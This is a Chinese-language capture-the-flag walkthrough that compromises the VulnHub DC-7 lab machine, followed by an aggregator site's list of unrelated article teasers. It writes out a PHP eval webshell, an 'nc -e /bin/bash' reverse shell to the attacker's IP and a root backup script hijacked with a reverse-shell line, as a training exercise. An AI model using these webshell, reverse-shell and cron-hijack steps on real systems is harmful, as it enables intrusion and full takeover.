DC-7靶场

一.环境搭建

1.下载地址

靶机下载地址:https://download.vulnhub.com/dc/DC-7.zip

2.虚拟机配置

设置nat,打开靶机,遇到错误点重试和是

 开启后如图所示即可

二.开始渗透

1.信息收集

首先找到靶机的ip地址

arp-scan -l

 

发现靶机的ip地址为192.168.111.135,攻击机(kali)的IP地址为192.168.111.128

用nmap扫描一下开启的服务和端口

发现开启http和ssh服务,用浏览器打开该地址进行访问

 发现提示

让我们不要用暴力破解,看下面cms为drupal

用工具探测一下版本信息和中间件‘

whatweb -v http://192.168.111.135

 

drupal版本为8,apache版本为2.4.25

常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容

点开他的github,很明显是想提示我们在他上传的代码中找到相关信息

staffdb/config.php at master · Dc7User/staffdb · GitHub 

找到数据库的相关配置文件

<?php$servername = "localhost";$username = "dc7user";$password = "MdR3xOgB7#dW";$dbname = "Staff";$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

2.获得shell

尝试用ssh进行连接

ssh dc7user@192.168.111.135

密码如下 

MdR3xOgB7#dW

3.提权

在当前目录下有一个mbox,查看mbox里面的内容

看到下面这行内容

 

看到一个备份脚本,我们对其内容进行查看

cat /opt/scripts/backups.sh

 

查看这个文件的运行权限

ls -l /opt/scripts/backups.sh

 

可以有root和www-data执行

脚本中使用如下命令,百度了一下drush命令

drush sql-dump --result-file=/home/dc7user/backups/website.sql

 进入网页的目录,然后修改密码

cd /var/www/html
drush user-password admin --password="123456"

 

点击login,进入后台登录admin/123456,登录成功

 同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell

 插件下载地址如下

Releases for PHP | Drupal.org

点击下载tar.gz,下载完毕后,点击后台界面的extend

点击install new module,点击浏览上传这个插件,点击install

 显示如下界面表示安装成功

 很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析

 

 我们进入主界面,点击content,点击basic page,写入小马

<?php eval(@$_POST['mlws']); ?>

 一定要选中下面的文本格式(text format)为phpcode,点击save

连接shell

在kali启一个监听端口

nc -lvvp 4444

在蚁剑执行如下命令

nc -e /bin/bash 192.168.111.128 4444

用python启动一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

 

然后将反弹shell的脚本写入定时启动的sh中,反弹root的shell 

echo "nc -e /bin/bash 192.168.111.128 7777" >>  /opt/scripts/backups.sh

 

kali端启动监听

nc -lvvp 7777

等待,等待,等个五分钟就反弹shell了 

 

 完事,获取到最终的flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/774379.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

影视接口支持资源站去插播,官解官替,切片

​​​​​uutb.centos.chat/jsonwjm.php/?url 公益提供&#xff0c;请友好调用

分布式ID生成方案总结

分布式场景下&#xff0c;需要保证每一个服务拿到的id是唯一的。本文讨论、分析、总结了一些常见的分布式ID生成方案 结论&#xff1a;技术上没有银弹&#xff0c;每种分布式id都有自己的使用场景。uuid适用于业务比较简单&#xff0c;对性能没有太高追求等。 目前主流是 基于数…

某手信息流如何跳V,达到精准数据回传?

在数字营销的新纪元中&#xff0c;快手磁力引擎凭借其卓越的推广能力&#xff0c;已经吸引了无数品牌的目光。而为了更有效地将快手上的流量转化为企业微信的用户&#xff0c;数灵通正逐渐崭露头角&#xff0c;成为品牌方的得力助手。今天&#xff0c;我们就来探讨一下&#xf…

Pytorch多机多卡分布式训练

多机多卡分布式&#xff1a; 多机基本上和单机多卡差不多&#xff1a; 第一台机器&#xff08;主设备&#xff09;&#xff1a; torchrun --master_port 6666 --nproc_per_node8 --nnodes${nnodes} --node_rank0 --master_addr${master_addr} train_with_multi_machine_an…

【问题处理】蓝鲸监控-数据断点解决

本文来自腾讯蓝鲸智云社区用户&#xff1a;fadewalk 在问答社区看到有小伙伴在落地蓝鲸的过程中出现监控平台的grafana面板数据断点问题&#xff0c;往往出现这种问题&#xff0c;都比较的头疼。 如果将CMDB&#xff08;配置管理数据库&#xff09;比作运维的基石&#xff0c;…

嵌入式Linux:空洞文件

空洞文件&#xff08;Sparse File&#xff09;是一种在磁盘上并非完全分配存储空间的文件。它包含了一些逻辑上存在但物理上并未存储的数据。 空洞文件在多线程共同操作文件时具有极大的优势。当创建一个巨大的文件时&#xff0c;单个线程逐步构建文件会耗费大量时间。一种优化…

Soft Robotics:两栖环境下螃蟹仿生机器人的行走控制

传统水陆两栖机器人依靠轮胎或履带与表面的接触及摩擦产生推进力&#xff0c;这种对于表面接触的依赖性限制了现有水陆两栖机器人在低重力环境下&#xff08;如水中&#xff09;的机动性。利用生物自身的推进机制&#xff0c;人为激发生物运动行为&#xff0c;由活体生物与微机…

P1923 【深基9.例4】求第 k 小的数 Python 并未AC的一题

【深基9.例4】求第 k 小的数 题目描述 输入 n n n&#xff08; 1 ≤ n < 5000000 1 \le n < 5000000 1≤n<5000000 且 n n n 为奇数&#xff09;个数字 a i a_i ai​&#xff08; 1 ≤ a i < 10 9 1 \le a_i < {10}^9 1≤ai​<109&#xff09;&#xff…

电阻的妙用:限流、分压、滤波,助力电路设计!

电阻可以降低电压&#xff0c;这是通过电阻的分压来实现的。事实上&#xff0c;利用电阻来降低电压只是电阻的多种功能之一。电路中的电阻与其他元件&#xff08;电容、电感&#xff09;结合用于限流、滤波等。&#xff08;本文素材来源&#xff1a;https://www.icdhs.com/news…

AKShare 快速入门

AKShare 快速入门 查看数据 AKShare 快速入门 具体函数使用详情, 请查看 AKShare 文档 每个接口的示例代码 AKShare 数据接口一览 交易所期货数据 “get_cffex_daily”, # 中国金融期货交易所每日交易数据 “get_cffex_rank_table”, # 中国金融期货交易所前20会员持仓…

简明 Python 教程(第9章 面向对象编程)

本章开始介绍Python的面向对象编程&#xff0c;Python这种动态语言的面向对象和很多强类型语言如JAVA&#xff0c;C#&#xff0c;C等语法上区别还是比较大的&#xff0c;但总体思路基本还是相通的。面向对象编程是一种编程范式&#xff0c;它使用对象来表示现实世界中的实体&am…

C++ :STL中vector扩容机制

vector是STL提供的动态数组&#xff0c;它会在内部空间不够用时动态的调整自身的大小&#xff0c;调整过程中会有大量的数据拷贝&#xff0c;为了减少数据拷贝的次数vector会在调整空间的时候尽量多申请一些空间&#xff0c;这些预留出的空间可以很大程度上减少拷贝的发生。 在…

适合新手小白的wordpress详细安装教程

1、下载程序 到wordpress官方网站下载wordpress程序&#xff0c;官方下载地址&#xff1a;Download | WordPress.org China 简体中文。 下载最新版的wordpress程序 https://cn.wordpress.org/latest-zh_CN.zip 2、上传程序 上传程序前先确认主机是否符合安装的环境要求&…

文件压缩与解压命令

(1)tar 打包或解包 tar 将文件打包tar cvf xxxx.tar(打包好的名字) 需要打包的所有文件名 各参数的意义如下: c:创建包文件 f:指定目标为文件而不是设备; v:显示详细过程; t:显示包中的内容而不释放; x:释放包中的内容 z:GNU版本新加的,使得tar有压缩和解压的功能; 解…

爬虫基础训练题

1.抓取imooc网站实战课程部分的课程名称&#xff08;所有课程大概7页&#xff0c;抓取1到5页&#xff09;&#xff0c;并把所有课程名称存储为txt文件第一页地址 2.设置一个请求头&#xff08;headers&#xff09;&#xff0c;这是一个字典&#xff0c;用于在HTTP请求中设置请…

wordpress搬家修改前缀后台无法访问

wordpress更换域名后&#xff0c;后台不能访问&#xff0c;出现以下提示&#xff1a;Sorry, you are not allowed to access this page. 出现这种情况一般是因为更改了数据表的前缀了&#xff0c;比如&#xff0c;由原来的wp_改为了wp_louyuwu_ 解决办法&#xff1a; 1、打开…

【C++】 switch 语句case后面可以跟 string变量吗? case后面可以怎么跟 string变量?

文章目录 在 C 中&#xff0c;case 语句通常是用于 switch 语句中&#xff0c;用来匹配整数或枚举类型的常量。在标准的 C 中&#xff0c;case 语句后面不能直接跟字符串变量&#xff0c;因为 case 语句要求其后面是一个常量表达式。 如果想在 switch 语句中匹配字符串&#x…

职场人必备!效率翻倍的多微信号必备管理工具大揭秘

在职场中&#xff0c;高效率的工作方式是非常重要的。而为了提高工作效率&#xff0c;合理运用一些工作神器也是必不可少的。今天给大家分享一个多微信号管理工具——微信管理系统&#xff0c;它能够帮助职场人员管理多个微信号&#xff0c;让工作变得更加高效。 首先&#xf…

mamba的学习记录

最近新出了一种很火的架构mamba&#xff0c;听说吊打transformer&#xff0c;特此学习一下&#xff0c;总结一下学习的内容。 state-spaces/mamba (github.com)3个月8Kstar&#xff0c;确实有点受欢迎。 目录 1.先验 RNN​ LSTM ​2.mamba State Space Models​ Selecti…

Django 自定义中间件(IP限制频率、用户权限)

【一】用户权限 &#xff08;1&#xff09;要求 不同的用户&#xff0c;有不同的操作权限比如 超级管理员&#xff0c;拥有所有权限管理员可以增加、查询、修改普通用户只能查询 &#xff08;2&#xff09;逻辑梳理 理论来说&#xff0c;这个权限需要保存在数据库中 但是这…